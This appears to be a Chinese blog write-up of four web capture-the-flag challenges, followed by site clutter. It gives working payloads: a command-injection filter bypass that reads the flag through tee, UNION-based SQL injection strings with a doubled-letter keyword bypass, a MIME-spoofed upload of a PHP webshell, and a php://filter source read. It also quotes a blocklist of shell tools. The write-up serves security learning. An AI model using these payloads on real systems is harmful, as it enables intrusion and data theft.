2024年3月开学测试复现

最新推荐文章于 2024-08-05 16:39:38 发布
最新推荐文章于 2024-08-05 16:39:38 发布
阅读量958 收藏 17
点赞数 9
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880442/article/details/136855073
版权

 1.Rceeee(web)

if(!preg_match("/\;|\&|\\$|\x09|\x26|tac|cat|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag/i", $cmd))一个if语句,过滤了很多东西,但后面还是get传cmd。随便构建:?cmd=1,会发现没有没有回显,接着看下去,发现shell_exec函数。查了一下shell_exec()函数是PHP中的内置函数,用于通过 shell 执行命令并以字符串形式返回完整输出。如果命令没有输出,则返回空字符串,它是没有回显的。没有回显的话我们可以把它写进文件里再读出就行了。

通过搜索可以用tee命令来写。Tee命令是一个命令行工具,它从标准输入读取数据,同时将结果打印到文件中和标准输出到屏幕中。构建?cmd=ls /|tee a.txt.

然后访问a.txt文件就可以看到根目录。

 

 有了根目录就可以继续把flag里面的东西写到文件中,构建?cmd=ca\t /fl*g|tee a.txt,再访问就行了。

2.斗宗强者恐怖如斯

第一眼看到一个登录页面,但源代码什么东西都没有,判断为sql注入,找注入点。

 

 尝试用弱口令登录,admin,admin123。转到注入界面

 输入?id=1’有报错,有注入点。

 看报错语句发现是’)闭合的,构建?id=-1’) union select 1,2,3--+。有回显

 但是?id=-1’) union select 1,2,3,4--+会报错,说明表中只有三列,

 构建?id=-1’) union select 1,2,database()--+,爆出当前数据库的名字

数据库名字是xitif_sql。

#直接套用语句

·  ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

·  

构建?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’xitif_sql’ --+

 

很好,成功报错了,看一下报错的语句,发现information少了or,就改成infoorrmation,这样它执行的sql语句就是

SELECT * FROM articles WHERE id=('-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='xitif_sql' -- ')

就可以得到表名

 

 接着爆表的字段,构建?id=-1') union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag' --+。爆出一个字段flAg

 

 接着爆该字段的所有数据构建?id=-1') union select 1,2,group_concat(flAg) from xitif_sql.flag --+,就可以得到flag。

3.这都不做(web)

这是一道文件上传题,随便上传一个php文件

 发生了报错,去搜一下什么意思,是只可以传jpg文件,直接抓包,修改application/octet-stream为image/jpeg,并写入一句话木马,点发送

 还是报错,不能够有PHP,那就把一句话木马的php删了再发送

 

 这里成功上传了,它让猜猜路径在哪,先访问upload/1.php。发现不对那它可能是把php过滤了?在bp中双写绕过看一下

 再访问,成功了。

 接着用蚁剑连接就可以,在里面就有flag。

 4.一个朴实无华的页面(web)

 打开什么都没有?

 显示about:blank,搜了一下about:blank 是当浏览器无其他显示时显示的页面。它不是互联网上的页面,而是浏览器内部的内容。可以细看这里:https://www.freecodecamp.org/chinese/news/about-blank-what-does-about-blank-mean-and-why-is-it-blocked-in-chrome-and-firefox/ 这是电脑设置问题,无伤大雅,可以抓包在bp上就可以看到题目的内容:

 

 可以看到它禁用了很多东西(但我也用不到啊,页面都没有),在源代码可以看到它说:web拿到一个网站第一步该怎么做呢?不就信息收集嘛。欧克,扫目录。这里就直接先用御剑扫一下发现有robots.txt

 访问一下,看到php,接着访问

 

 哦豁,出来了源代码,简单分析一下,用get传G7,过滤了base,构建?G7=php://filter/convert.Base64-encode/resource=flag.php

 得到了编码,解一下就可以得到flag。

 

蹦蹦炸弹芜湖
关注
  • 9
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
软件测试面试经典题2024
02-19
### 软件测试面试经典题2024知识点详解 #### 一、基础概念类 1. **什么是软件测试及其目的?** - **定义:** 软件测试是指通过执行软件来评估其功能、性能、可靠性、安全性和易用性的过程。 - **目的:** 主要...
96原版_96mpc论文代码复现_
10-04
本项目“96原版_96mpc论文代码复现”显然是针对1996的一篇关于模型预测控制(MPC,Model Predictive Control)的论文进行的代码实现。模型预测控制是一种先进的控制策略,广泛应用于自动化、过程控制以及现代...
2019软件测试度总结.doc
11-22
【2019软件测试度总结】 在2019的软件测试行业中,随着软件质量日益受到重视,软件测试这一领域也在不断发展和完善。然而,许多从事软件测试的专业人士仍面临不少挑战,如如何提高自身技能,如何有效地解决...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
2019软件测试个人工作总结.doc
11-22
【2019软件测试个人工作总结】 在2019的软件测试工作中,我深刻体验到测试工作的重要性和挑战性。刚开始接触这个行业时,我对软件测试的理解仅停留在表面,不清楚集成测试、系统测试的区别,对CMM(能力成熟度...
简单的 mongoDB 学习
qq_19342829的博客
07-31 552
mongodb入门学习整理
社区养老服务小程序的设计
Karen198的博客
07-31 640
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
用 Bytebase 实现批量、多环境、多租户数据库的丝滑变更
Bytebase的博客
08-02 1119
现在,你已学会如何使用部署配置和数据库分组在 Bytebase 中运行批量更改。动手试试吧!💡 更多资讯,请关注 Bytebase 公号:Bytebase。
MySQL备份与恢复
m0_74860678的博客
08-01 606
在生产环境中,数据的安全性至关重要任何数据的丢失都可能产生严重的后果造成数据丢失的原因程序错误人为操作错误运算错误磁盘故障灾难(如火灾、地震)和盗窃# 开启二进制日志功能[mysqld]# 重启服务# 有 mysql-bin.000001 就代表成功。
使用MySQLdump定时备份数据库实战
ithongchou的博客
08-03 75
手动执行脚本文件,并查看结果,检验脚本没有问题,因为脚本第一行已经指定脚本执行器,所以这里执行不需要使用。工具来设置定时任务。以下是一个简单的例子,展示如何每天凌晨。然后,你需要设置一个cron任务来定时执行这个脚本。确定系统定时任务已经开始,查看系统定时任务是否已经开启。上编辑的脚本格式在·Linux·平台不兼容问题。首先,你需要创建一个备份脚本。进行数据库的定时备份,你可以使用。保存这个脚本到一个文件,比如。
杂谈 | windows批处理脚本 | 配置项目环境变量
zwcslj的博客
07-31 1275
命令回显功能是指在运行命令或脚本时,系统将命令的执行过程和结果显示在屏幕上,使用户能够实时地看到命令的执行情况。通常,当命令回显功能打开时,在执行每一步命令时,系统将会显示执行的命令本身以及对应的结果,从而帮助用户了解命令的执行过程,排查可能出现的问题。关闭回显时,命令提示符不会出现在“命令提示符”窗口中。若要再次显示命令提示符,请键入 echo on。
MHA高可用配置及故障切换
m0_70627741的博客
08-02 1390
HMA(MasterHigh Availablity)是一套优秀的Mysql高可用环境下的故障切换和主从复制的软件解决MySLQ单点的问题MySQL故障切换过程中,MHA能做到0-30秒内自动完成故障切换操作。故障切换的过程中最大程度上保证数据的一致性,以达到真正意义上的高可用。MHA是建在主从复制的基础上的;0-30秒自动完成故障切换是MHA的特性。
实战:MySQL数据同步神器之Canal
为无为,事无事,味无味。
08-02 1017
canal [kə'næl],译意为水道/管道/沟渠,主要用途是基于 MySQL 数据库增量日志解析,提供增量数据订阅和消费。项目起源于阿里巴巴内部对于跨机房数据同步的需求,通过解析MySQL的二进制日志(Binary Log),Canal能够捕获并推送数据库的变更事件,满足了诸如数据库镜像、实时备份、索引实时维护等多种业务场景的需求。GitHub - alibaba/canal: 阿里巴巴 MySQL binlog 增量订阅&消费组件。
Switchover和Failover切换方案(实战)
一个只求实际的程序猿
08-02 784
-检查主库下switchover_status字段,如果值为"session active"或者"to standby", 则主数据库角色可以切换为备库角色。=======================检查=================================--两个节点各执行2次。2.--备库切换为主库(切换可在1节点执行,启停需所有集群节点都执行)3.--主库切换为备库(切换1节点执行,启停需所有集群节点都执行)4.--获取主、备库上的信息以及保护模式(主备库执行)
Qt拖拽事件详解及代码实现
最新发布
Isana_Yashiro的博客
08-05 511
qt拖拽事件是一项非常常用并且非常好用的功能,拖拽实际上是一种信息传递的载体,其目的是将信息从一个对象传递给另一个对象。通过拖拽可以简化文件打开或业务操作流程,qt初学者学会拖拽事件后就可以马上开发出许多有趣的项目,本文以一个简单的示例来介绍拖拽事件功能。DragDropWidget类实现了拖拽发起对话框,主要是重写了鼠标事件函数,用于设置拖拽搭载的信息,这里就是一个字符串,实际上也可以是自定义的类或者其他对象。代码详见dragdropwidget.h及dragdropwidget.cpp。
linux安装weblogic
m0_46400195的博客
08-05 464
域文件位置就是python文件中设置的,位置(cd /root/web/weblogic/softWare/projects/doamins/testDomain)(以自己python为主)想要启动weblogic 12版本及以后都需要去oracle_common目录下配合启动脚本进行服务器启动。weblogic不允许root用户进行安装,所以要提前创建weblogic用户来进行安装。例如:http://192.168.0.143:7001/console。用户名:启动weblogic的用户名。
简单的docker学习 第8章 docker常用服务安装
qq_19342829的博客
08-05 949
b站docker学习笔记
【redis 第一篇章】认识一下
Tsing
08-01 370
1、定义:泛指非关系性数据库。2、特点:方便扩展,数据之间没有关系;大数据量高性能;数据类型多样性。
Redis高可用
扮瘦人的博客
08-01 383
Redis高可用学习
20136软件测试面试精选题库
"本文档是20136软件测试面试和笔试题目的集合,涵盖了各种测试领域的基础知识和实践经验,旨在帮助求职者准备软件测试工程师的面试。" 1. **兼容性测试**:兼容性测试是确保软件在不同硬件、操作系统、浏览器或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值